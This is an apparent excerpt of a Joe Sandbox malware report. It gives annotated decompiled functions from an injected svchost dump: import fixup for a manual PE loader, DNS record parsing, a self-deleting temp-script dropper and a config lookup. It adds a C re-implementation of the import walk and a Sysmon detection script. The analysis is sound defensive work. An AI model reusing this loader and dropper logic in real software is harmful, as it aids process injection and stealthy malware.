                                                                                                                                  				_Unknown_base(*)()* _t76;
                                                                                                                                  				_Unknown_base(*)()* _t77;
                                                                                                                                  				intOrPtr* _t82;
                                                                                                                                  				void* _t85;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				_Unknown_base(*)()* _t89;
                                                                                                                                  
                                                                                                                                  				_t82 = _a4;
                                                                                                                                  				_t47 =  *_t82;
                                                                                                                                  				_t3 = _t82 + 4; // 0x65e85621
                                                                                                                                  				_t69 =  *_t3;
                                                                                                                                  				_v12 = 1;
                                                                                                                                  				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
                                                                                                                                  					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
                                                                                                                                  					_t48 = IsBadReadPtr(_t85, 0x14);
                                                                                                                                  					__eflags = _t48;
                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                  						L29:
                                                                                                                                  						return _v12;
                                                                                                                                  					}
                                                                                                                                  					_t87 = _t85 + 0x10;
                                                                                                                                  					_v8 = _t87;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t50 =  *(_t87 - 4);
                                                                                                                                  						__eflags = _t50;
                                                                                                                                  						if(_t50 == 0) {
                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  						_t52 = LoadLibraryA(_t50 + _t69);
                                                                                                                                  						_v16 = _t52;
                                                                                                                                  						__eflags = _t52 - 0xffffffff;
                                                                                                                                  						if(_t52 == 0xffffffff) {
                                                                                                                                  							L28:
                                                                                                                                  							_t44 =  &_v12;
                                                                                                                                  							 *_t44 = _v12 & 0x00000000;
                                                                                                                                  							__eflags =  *_t44;
                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  						_t10 = _t82 + 8; // 0x8bfffffa
                                                                                                                                  						_t53 =  *_t10;
                                                                                                                                  						__eflags = _t53;
                                                                                                                                  						if(_t53 != 0) {
                                                                                                                                  							_t14 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							_t54 = E0251EBED(_t53, 4 +  *_t14 * 4);
                                                                                                                                  						} else {
                                                                                                                                  							_t11 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							_t54 = E0251EBCC(4 +  *_t11 * 4);
                                                                                                                                  						}
                                                                                                                                  						 *(_t82 + 8) = _t54;
                                                                                                                                  						__eflags = _t54;
                                                                                                                                  						if(_t54 == 0) {
                                                                                                                                  							goto L28;
                                                                                                                                  						} else {
                                                                                                                                  							_t18 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
                                                                                                                                  							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
                                                                                                                                  							_t55 =  *(_t87 - 0x10);
                                                                                                                                  							__eflags = _t55;
                                                                                                                                  							if(_t55 == 0) {
                                                                                                                                  								_t89 =  *_t87 + _t69;
                                                                                                                                  								__eflags = _t89;
                                                                                                                                  								_t76 = _t89;
                                                                                                                                  							} else {
                                                                                                                                  								_t89 = _t55 + _t69;
                                                                                                                                  								_t76 =  *_v8 + _t69;
                                                                                                                                  							}
                                                                                                                                  							_t56 =  *_t89;
                                                                                                                                  							__eflags = _t56;
                                                                                                                                  							if(_t56 == 0) {
                                                                                                                                  								L25:
                                                                                                                                  								__eflags = _v12;
                                                                                                                                  								if(_v12 == 0) {
                                                                                                                                  									goto L29;
                                                                                                                                  								}
                                                                                                                                  								_v8 = _v8 + 0x14;
                                                                                                                                  								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
                                                                                                                                  								__eflags = _t59;
                                                                                                                                  								if(_t59 == 0) {
                                                                                                                                  									_t87 = _v8;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								goto L29;
                                                                                                                                  							} else {
                                                                                                                                  								_a4 = _t76;
                                                                                                                                  								_a4 = _a4 - _t89;
                                                                                                                                  								__eflags = _t56;
                                                                                                                                  								do {
                                                                                                                                  									if(__eflags >= 0) {
                                                                                                                                  										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
                                                                                                                                  										__eflags = _t62;
                                                                                                                                  										if(_t62 == 0) {
                                                                                                                                  											L21:
                                                                                                                                  											_t63 = _a4;
                                                                                                                                  											__eflags =  *(_t63 + _t89);
                                                                                                                                  											if( *(_t63 + _t89) == 0) {
                                                                                                                                  												_t38 =  &_v12;
                                                                                                                                  												 *_t38 = _v12 & 0x00000000;
                                                                                                                                  												__eflags =  *_t38;
                                                                                                                                  												goto L25;
                                                                                                                                  											}
                                                                                                                                  											goto L22;
                                                                                                                                  										}
                                                                                                                                  										_t77 = _a4;
                                                                                                                                  										__eflags = _t62 -  *(_t77 + _t89);
                                                                                                                                  										if(_t62 ==  *(_t77 + _t89)) {
                                                                                                                                  											goto L21;
                                                                                                                                  										}
                                                                                                                                  										L20:
                                                                                                                                  										 *(_t77 + _t89) = _t62;
                                                                                                                                  										goto L21;
                                                                                                                                  									}
                                                                                                                                  									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
                                                                                                                                  									_t77 = _a4;
                                                                                                                                  									goto L20;
                                                                                                                                  									L22:
                                                                                                                                  									_t89 = _t89 + 4;
                                                                                                                                  									_t56 =  *_t89;
                                                                                                                                  									__eflags = _t56;
                                                                                                                                  								} while (__eflags != 0);
                                                                                                                                  								goto L25;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L29;
                                                                                                                                  				}
                                                                                                                                  				return 1;
                                                                                                                                  			}
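What E02516069 does, read against the PE layout: `_a4` points at a small loader context whose first field (`_t47`) is the IMAGE_NT_HEADERS pointer and whose second (`_t69`) is the image base; offsets +0x80/+0x84 in the NT headers are the import data directory's VirtualAddress and Size for a PE32 image. If the import directory is non-empty, the function walks 0x14-byte IMAGE_IMPORT_DESCRIPTOR entries (each probed with IsBadReadPtr), loads the DLL named at descriptor offset +0xC with LoadLibraryA, appends the returned module handle to a growable handle array kept at context offsets +8 (buffer) and +0xC (count), and then resolves every thunk: reading from OriginalFirstThunk (offset +0, falling back to FirstThunk when it is zero), calling GetProcAddress by ordinal when the thunk's sign bit is set (the `__eflags >= 0` test, low 16 bits as ordinal) or by name otherwise (`thunk + 2` skips the WORD hint of IMAGE_IMPORT_BY_NAME), and writing the result into the IAT slot. That is the import-fixup step of a manual PE loader, which fits the report's "Injects a PE file into a foreign processes" signature. Two details worth noting: the loop only fails when GetProcAddress returns NULL and the IAT slot is still zero, and the post-LoadLibraryA check compares the handle against 0xffffffff, so a NULL returned by a failed LoadLibraryA is not caught there.

The following is an added, portable re-implementation of that walk (not code from the sample or from Joe Sandbox) so the structure can be exercised offline. The Windows calls are replaced by explicit bounds checks and a caller-supplied resolver, and the image buffer and stub resolver are constructed for this demo; field offsets and the ordinal flag are the PE specification's.

```c
/* Added example (not code from the sample or from Joe Sandbox): portable
 * re-implementation of the import-resolution walk in E02516069. Windows calls
 * (LoadLibraryA, GetProcAddress, IsBadReadPtr) are replaced by bounds checks and
 * a resolver callback; the image and resolver below are constructed for the demo. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMPORT_DESCRIPTOR_SIZE 0x14        /* sizeof(IMAGE_IMPORT_DESCRIPTOR): the 0x14 in the decompiled code */
#define ORDINAL_FLAG32         0x80000000u /* IMAGE_ORDINAL_FLAG32: the sign-bit test (__eflags >= 0) above */

/* Stands in for LoadLibraryA+GetProcAddress. name == NULL means import by ordinal. */
typedef uint32_t (*resolver_fn)(const char *dll, const char *name, uint16_t ordinal);

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* True if a NUL-terminated string starts at rva and ends inside the image. */
static int str_in_image(const uint8_t *image, size_t size, uint32_t rva)
{
    return rva < size && memchr(image + rva, 0, size - rva) != NULL;
}

/* Walk the import directory at import_rva of a mapped image of `size` bytes and
 * patch every IAT slot. Returns the number of resolved thunks, or -1 when a
 * reference leaves the image or the resolver fails (the _v12 = 0 path above). */
int resolve_imports(uint8_t *image, size_t size, uint32_t import_rva, resolver_fn resolve)
{
    int resolved = 0;
    for (uint32_t d = import_rva;; d += IMPORT_DESCRIPTOR_SIZE) {
        if (d + IMPORT_DESCRIPTOR_SIZE > size) return -1;      /* IsBadReadPtr(desc, 0x14) */
        uint32_t original_first_thunk = rd32(image + d);       /* +0x00: INT RVA */
        uint32_t name_rva            = rd32(image + d + 0x0c); /* +0x0c: DLL name RVA */
        uint32_t first_thunk         = rd32(image + d + 0x10); /* +0x10: IAT RVA */
        if (name_rva == 0) break;                              /* all-zero descriptor ends the array */
        if (!str_in_image(image, size, name_rva)) return -1;
        const char *dll = (const char *)image + name_rva;
        /* Read thunks from the INT; if OriginalFirstThunk is 0 use the IAT itself, as the sample does */
        uint32_t int_rva = original_first_thunk ? original_first_thunk : first_thunk;
        for (uint32_t i = 0;; i += 4) {
            if (int_rva + i + 4 > size || first_thunk + i + 4 > size) return -1;
            uint32_t thunk = rd32(image + int_rva + i);
            if (thunk == 0) break;                             /* zero thunk ends this DLL's list */
            uint32_t addr;
            if (thunk & ORDINAL_FLAG32) {
                addr = resolve(dll, NULL, (uint16_t)(thunk & 0xffff));  /* GetProcAddress(h, ord & 0xffff) */
            } else {
                if (!str_in_image(image, size, thunk + 2)) return -1;
                addr = resolve(dll, (const char *)image + thunk + 2, 0); /* skip the WORD Hint */
            }
            if (addr == 0) return -1;                          /* simplified: any NULL result is fatal */
            wr32(image + first_thunk + i, addr);
            resolved++;
        }
    }
    return resolved;
}

/* ---- constructed demo image: one DLL, one import by name, one by ordinal ---- */
#define SAMPLE_IMAGE_SIZE 0x200
#define SAMPLE_IMPORT_RVA 0x100
#define SAMPLE_IAT_RVA    0x150
static uint8_t g_image[SAMPLE_IMAGE_SIZE];

/* Fake resolver with made-up addresses; unknown exports return 0 like GetProcAddress. */
static uint32_t stub_resolve(const char *dll, const char *name, uint16_t ordinal)
{
    if (strcmp(dll, "KERNEL32.dll") != 0) return 0;
    if (name == NULL) return 0x71000000u + ordinal;
    if (strcmp(name, "CreateEventA") == 0) return 0x71010000u;
    return 0;
}

/* Build the image with `name_import` as the by-name entry, resolve it, return the count. */
int run_demo(const char *name_import)
{
    if (strlen(name_import) > 0x40) return -1;
    memset(g_image, 0, sizeof g_image);
    wr32(g_image + SAMPLE_IMPORT_RVA + 0x00, 0x140);          /* OriginalFirstThunk -> INT at 0x140 */
    wr32(g_image + SAMPLE_IMPORT_RVA + 0x0c, 0x180);          /* Name -> "KERNEL32.dll" at 0x180 */
    wr32(g_image + SAMPLE_IMPORT_RVA + 0x10, SAMPLE_IAT_RVA); /* FirstThunk -> IAT at 0x150 */
    /* the descriptor at 0x114 stays all zero: the terminator */
    wr32(g_image + 0x140, 0x190);                 wr32(g_image + SAMPLE_IAT_RVA, 0x190);
    wr32(g_image + 0x144, ORDINAL_FLAG32 | 0x10); wr32(g_image + SAMPLE_IAT_RVA + 4, ORDINAL_FLAG32 | 0x10);
    memcpy(g_image + 0x180, "KERNEL32.dll", 13);
    strcpy((char *)g_image + 0x192, name_import);  /* IMAGE_IMPORT_BY_NAME at 0x190: Hint=0, then Name */
    return resolve_imports(g_image, sizeof g_image, SAMPLE_IMPORT_RVA, stub_resolve);
}

uint32_t demo_iat(int idx) { return rd32(g_image + SAMPLE_IAT_RVA + 4 * idx); }

int main(void)
{
    int n = run_demo("CreateEventA");
    printf("resolved %d thunks: IAT[0]=0x%08x IAT[1]=0x%08x\n", n, (unsigned)demo_iat(0), (unsigned)demo_iat(1));
    printf("unknown export -> %d\n", run_demo("NoSuchExport"));
    return 0;
}
```

Against a real memory dump the same walk can be run over the dumped module with the image base and import directory RVA taken from its headers; the bounds checks here replace IsBadReadPtr, which in the sample only guards the 0x14-byte descriptor and not the strings or thunk arrays it points to.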
























                                                                                                                                  0x02516071
                                                                                                                                  0x02516074
                                                                                                                                  0x0251607c
                                                                                                                                  0x0251607c
                                                                                                                                  0x02516082
                                                                                                                                  0x02516087
                                                                                                                                  0x02516099
                                                                                                                                  0x0251609c
                                                                                                                                  0x025160a2
                                                                                                                                  0x025160a4
                                                                                                                                  0x025161b2
                                                                                                                                  0x00000000
                                                                                                                                  0x025161b5
                                                                                                                                  0x025160aa
                                                                                                                                  0x025160ad
                                                                                                                                  0x025160b5

APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,025164CF,00000000), ref: 0251609C
• LoadLibraryA.KERNEL32(?,?,025164CF,00000000), ref: 025160C3
• GetProcAddress.KERNEL32(?,00000014), ref: 0251614A
• IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0251619E
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Read$AddressLibraryLoadProc
• String ID:
• API String ID: 2438460464-0
• Opcode ID: dfc91dbc714e26fe69cf5d1a1e43a324d86a16cda3095d01085f7442503c3416
• Instruction ID: 6907079b6d1c2ee8ce286b5a15880ec1502706525a7a5a3e7be7c839fc78dbfc
• Opcode Fuzzy Hash: dfc91dbc714e26fe69cf5d1a1e43a324d86a16cda3095d01085f7442503c3416
• Instruction Fuzzy Hash: 03418E71E40206EFEB24CF58C884BAABBBDFF54358F148469E815D7291E730E954CB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
			// Decompiler output as shown in the report; the comments are an added analyst reading, not part of the report.
			// __esi is the received buffer and _a4 its length. The 12-byte minimum, the three 16-bit counts at
			// offsets 6/8/10, and the 10-byte fixed fields per record with a length at +8, read through
			// ws2_32 ordinal 15 (ntohs), are consistent with walking DNS resource records into a linked list.
			// _t76 and _t15 are decompiler temporaries that were left undeclared.
			E02512923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;                                   // minimum buffer size (size of a DNS header)
				_v8 = 0;                                      // last node appended to the list
				_v16 = 0;                                     // head of the list being built
				if(_a4 >= _t37) {
					_t67 = E02512816(_t37, __esi, __ecx, __esi, _a4);   // offset past the header/question section (helper not shown)
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);   // sum of the three record counts, not byte-swapped; only a loop bound
						_v20 = _t41;                              // total record count
						_v12 = 0;                                 // records processed so far
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;                          // return the list head (or 0)
						}
						while(_t67 < _a4) {
							E0251EE2A(_t76,  &_v296, 0, 0x114);               // zero a 0x114-byte stack record (memset-like helper)
							_t70 = E02512871(_t67, _t81, _t76,  &_v292, _a4); // parse the record name into _v292; returns the offset after it
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {                                 // need 10 bytes of fixed fields after the name
								goto L13;
							}
							_t79 = __imp__#15;                                // ws2_32 ordinal 15: ntohs
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);      // record type
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);  // record class
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);  // data length
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;                                      // offset of the record data
							if((_t53 & 0x0000ffff) + _t71 > _a4) {           // bounds check on the data length
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0251EE2A(_t76, _t80, 0, 0x124);                  // zero the heap node
							E0251EE08(_t80,  &_v296, 0x114);                  // copy the parsed record into it (memcpy-like helper)
							 *_t80 =  *_t80 & 0x00000000;                     // first dword is the next pointer, cleared
							_t67 = _t71 + (_v28 & 0x0000ffff);                // advance past the record data
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;                                // link the previous node to this one
							} else {
								_v16 = _t80;                                  // first node becomes the head
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}

                                                                                                                                  0x025129e0
                                                                                                                                  0x025129e2
                                                                                                                                  0x025129e6
                                                                                                                                  0x025129ee
                                                                                                                                  0x025129f4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512a0a
                                                                                                                                  0x02512a0e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512a18
                                                                                                                                  0x02512a2a
                                                                                                                                  0x02512a33
                                                                                                                                  0x02512a36
                                                                                                                                  0x02512a38
                                                                                                                                  0x02512a3b
                                                                                                                                  0x02512a3e
                                                                                                                                  0x02512a43
                                                                                                                                  0x02512a4a
                                                                                                                                  0x02512a45
                                                                                                                                  0x02512a45
                                                                                                                                  0x02512a45
                                                                                                                                  0x02512a4c
                                                                                                                                  0x02512a55
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512a55
                                                                                                                                  0x00000000
                                                                                                                                  0x0251297e
                                                                                                                                  0x02512959
                                                                                                                                  0x00000000
                                                                                                                                  0x02512959
                                                                                                                                  0x00000000

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2e164b4536968f4af3d02d26a3c48d4ba88b56a56852dede5e317c5226fa0cab
                                                                                                                                  • Instruction ID: 6aec2cab50541321a94c51acac39536ceebf3a9e06b493bc7cc198c2bb23c7b7
                                                                                                                                  • Opcode Fuzzy Hash: 2e164b4536968f4af3d02d26a3c48d4ba88b56a56852dede5e317c5226fa0cab
                                                                                                                                  • Instruction Fuzzy Hash: F1319371A00329ABEB219FA9CC81BBEB7F4FF88701F10445AE945E6285E374D651CB58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                   			// Analyst's reading, added as comments; the decompiler output below is otherwise unchanged.
                                                                                                                                   			// The routine formats a script from a string decoded at run time, hands it to
                                                                                                                                   			// E02519064 (GetTempPathA, CreateFileA, WriteFile, CloseHandle per the API list
                                                                                                                                   			// below, i.e. it writes the text to a file under the temp directory) and then
                                                                                                                                   			// runs that file with ShellExecuteA. The module's own path is pushed twice for
                                                                                                                                   			// wsprintfA, the shape of a self-deleting batch file ("del <self> / if exist
                                                                                                                                   			// <self> goto"); the template text itself is not recovered on this page, so
                                                                                                                                   			// that reading is an inference.
                                                                                                                                   			E02519145(void* __eflags) {
                                                                                                                                   				char _v264;                 // own image path, MAX_PATH (0x104) bytes; later holds the temp-file path (inference)
                                                                                                                                   				char _v1288;                // formatted script body
                                                                                                                                   				char* _t13;
                                                                                                                                   				void* _t20;
                                                                                                                                   				void* _t23;
                                                                                                                                   				void* _t29;
                                                                                                                                   
                                                                                                                                   				_t29 = __eflags;
                                                                                                                                   				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);        // full path of the running image
                                                                                                                                   				CharToOemA( &_v264,  &_v264);                                    // convert to the OEM code page, which cmd.exe uses for batch files
                                                                                                                                   				_t13 =  &_v264;
                                                                                                                                   				_push(_t13);                                                     // same path passed twice: two %s in the template
                                                                                                                                   				_push(_t13);
                                                                                                                                   				wsprintfA( &_v1288, E02512544(0x25222f8,  &E025207A8, 0x66, 0xe4, 0xc8)); // E02512544 returns the format string, decoded into the 0x25222f8 buffer (inference from its use here)
                                                                                                                                   				E0251EE2A(_t23, 0x25222f8, 0, 0x100);                            // (buffer, 0, 0x100): clears the decoded string again, memset-style (inference)
                                                                                                                                   				_t20 = E02519064(_t29,  &_v1288,  &_v264);                       // write _v1288 to a temp file; its path is returned in _v264 (inference)
                                                                                                                                   				if(_t20 != 0) {
                                                                                                                                   					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);                // run the dropped file with its default verb
                                                                                                                                   				}
                                                                                                                                   				return _t20;
                                                                                                                                   			}

                                                                                                                                   Instruction addresses for this function: 0x02519145 to 0x025191ea (the per-line address column is collapsed here; 0x00000000 entries correspond to lines with no generated code)

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,025222F8), ref: 0251915F
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 02519166
                                                                                                                                  • CharToOemA.USER32 ref: 02519174
                                                                                                                                  • wsprintfA.USER32 ref: 025191A9
                                                                                                                                    • Part of subcall function 02519064: GetTempPathA.KERNEL32(00000400,?,00000000,025222F8), ref: 0251907B
                                                                                                                                    • Part of subcall function 02519064: wsprintfA.USER32 ref: 025190E9
                                                                                                                                    • Part of subcall function 02519064: CreateFileA.KERNEL32(025222F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0251910E
                                                                                                                                    • Part of subcall function 02519064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 02519122
                                                                                                                                    • Part of subcall function 02519064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0251912D
                                                                                                                                    • Part of subcall function 02519064: CloseHandle.KERNEL32(00000000), ref: 02519134
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 025191E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3857584221-0
                                                                                                                                  • Opcode ID: c95c0c9e80a82663b236f5a78d68ff0aa1c2107baa0807f33ae1b3f60e0731e0
                                                                                                                                  • Instruction ID: 40a038f3b2f0163f61e968d0bf924119dbb897c4f675f885bbcbea8c48d298b3
                                                                                                                                  • Opcode Fuzzy Hash: c95c0c9e80a82663b236f5a78d68ff0aa1c2107baa0807f33ae1b3f60e0731e0
                                                                                                                                  • Instruction Fuzzy Hash: 0E0184F68401697BE7309A518C89FDF3B7CEB96B01F010091BB05E10C0D670968D8F74
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
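
The behaviour in E02519145 (write a file under the temp directory, then ShellExecute it) is something a detection engineer can correlate from endpoint telemetry. The following is an added example, not code from the report or from the sample: it pairs Sysmon-style FileCreate (EventID 11, TargetFilename) and ProcessCreate (EventID 1, Image/CommandLine/ParentProcessId) records and reports every child process that is, or names on its command line, a temp file its parent created earlier. The event records are constructed, and the assumption that the dropped file is a batch script run through cmd.exe is mine; the page shows only that a temp file is written and executed.

```python
"""Correlate 'write a file under %TEMP%, then execute it' in Sysmon-style events.
Added example; the records below are constructed, not taken from any report."""

# Constructed sample events with only the fields the correlation needs.
# EID 11 = FileCreate, EID 1 = ProcessCreate (Sysmon field names).
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 4100,
     "Image": r"C:\Users\analyst\Desktop\sample.exe",
     "TargetFilename": r"C:\Users\analyst\AppData\Local\Temp\upd1.bat"},
    {"EventID": 1, "ProcessId": 4120, "ParentProcessId": 4100,
     "ParentImage": r"C:\Users\analyst\Desktop\sample.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe /c "C:\Users\analyst\AppData\Local\Temp\upd1.bat"'},
    # Benign pair: an editor writes an autosave file and later opens a document.
    {"EventID": 11, "ProcessId": 5000,
     "Image": r"C:\Program Files\Editor\editor.exe",
     "TargetFilename": r"C:\Users\analyst\AppData\Local\Temp\autosave.tmp"},
    {"EventID": 1, "ProcessId": 5010, "ParentProcessId": 5000,
     "ParentImage": r"C:\Program Files\Editor\editor.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\analyst\Documents\notes.txt"},
]

# Covers the per-user %TEMP% as well as C:\Windows\Temp, which GetTempPathA
# returns for services running as SYSTEM.
TEMP_MARKERS = ("\\temp\\", "\\tmp\\")


def is_temp_path(path):
    """True when the path lies under a Temp/Tmp directory (case-insensitive)."""
    low = path.lower()
    return any(marker in low for marker in TEMP_MARKERS)


def find_temp_drop_and_exec(events):
    """Return (creator_image, dropped_file, child_image) tuples for every
    ProcessCreate whose parent earlier created a temp file that the child
    either is (an .exe run directly) or names on its command line (a .bat
    run via cmd.exe, which is what ShellExecute does for batch files)."""
    created = {}   # ProcessId -> temp files that process created, in event order
    hits = []
    for ev in events:
        if ev["EventID"] == 11 and is_temp_path(ev["TargetFilename"]):
            created.setdefault(ev["ProcessId"], []).append(ev["TargetFilename"])
        elif ev["EventID"] == 1:
            image = ev["Image"].lower()
            cmdline = ev.get("CommandLine", "").lower()
            for dropped in created.get(ev["ParentProcessId"], []):
                low = dropped.lower()
                if image == low or low in cmdline:
                    hits.append((ev["ParentImage"], dropped, ev["Image"]))
    return hits


if __name__ == "__main__":
    for creator, dropped, child in find_temp_drop_and_exec(SAMPLE_EVENTS):
        print(f"{creator} wrote {dropped} and then ran it via {child}")
```

Two caveats for a real pipeline: process IDs are reused, so key the `created` map on Sysmon's ProcessGuid rather than ProcessId, and EventID 11 fires when the file handle is created, before any content is written, so the rule cannot see that the script deletes its creator; that is why it matches on the drop-then-execute pair rather than on file content. Installers and updaters that extract and run a helper from %TEMP% will also match and need allow-listing by signer or image path.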

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			// Analyst's reading, added as comments; the decompiler output below is otherwise unchanged.
                                                                                                                                   			// Linear search over a buffer of packed "key\0value\0" pairs for a key whose length
                                                                                                                                   			// matches _a12 and which compares equal case-insensitively; returns a pointer to the
                                                                                                                                   			// value or 0. The API trace below shows it being called with the key "localcfg".
                                                                                                                                   			E02512419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {   // _a4 = buffer, _a8 = its length in bytes, _a12 = key to find
                                                                                                                                   				int _v8;            // strlen(key)
                                                                                                                                   				int _t18;
                                                                                                                                   				intOrPtr _t20;
                                                                                                                                   				CHAR* _t21;
                                                                                                                                   				int _t30;
                                                                                                                                   				CHAR* _t36;
                                                                                                                                   
                                                                                                                                   				_t18 = lstrlenA(_a12);
                                                                                                                                   				_t36 = _a4;                                  // current key
                                                                                                                                   				_v8 = _t18;
                                                                                                                                   				_t20 = _a8 + _t36;                           // one past the end of the buffer
                                                                                                                                   				_a8 = _t20;
                                                                                                                                   				if(_t36 >= _t20) {
                                                                                                                                   					L5:
                                                                                                                                   					_t21 = 0;                                // not found
                                                                                                                                   				} else {
                                                                                                                                   					while(1) {
                                                                                                                                   						_t30 = lstrlenA(_t36);               // length of the current key
                                                                                                                                   						_t7 =  &(_t36[1]); // 0x1
                                                                                                                                   						_a4 = _t30 + _t7;                    // start of the value that follows the key's NUL
                                                                                                                                   						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
                                                                                                                                   							break;                           // match: same length, equal ignoring case, value inside the buffer
                                                                                                                                   						}
                                                                                                                                   						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);   // skip key\0value\0; lstrlenA(_a4) runs with no bounds check on the value
                                                                                                                                   						if(_t36 < _a8) {
                                                                                                                                   							continue;
                                                                                                                                   						} else {
                                                                                                                                   							goto L5;
                                                                                                                                   						}
                                                                                                                                   						goto L6;
                                                                                                                                   					}
                                                                                                                                   					_t21 = _a4;                              // pointer to the matched key's value
                                                                                                                                   				}
                                                                                                                                   				L6:
                                                                                                                                   				return _t21;
                                                                                                                                   			}

                                                                                                                                   Instruction addresses for this function: 0x02512429 to 0x0251247b (the per-line address column is collapsed here; 0x00000000 entries correspond to lines with no generated code)

                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001), ref: 02512429
                                                                                                                                  • lstrlenA.KERNEL32(?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001,02511E3D,00000001,localcfg,lid_file_upd), ref: 0251243E
                                                                                                                                  • lstrcmpiA.KERNEL32(?,?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001,02511E3D,00000001,localcfg), ref: 02512452
                                                                                                                                  • lstrlenA.KERNEL32(?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001,02511E3D,00000001,localcfg,lid_file_upd), ref: 02512467
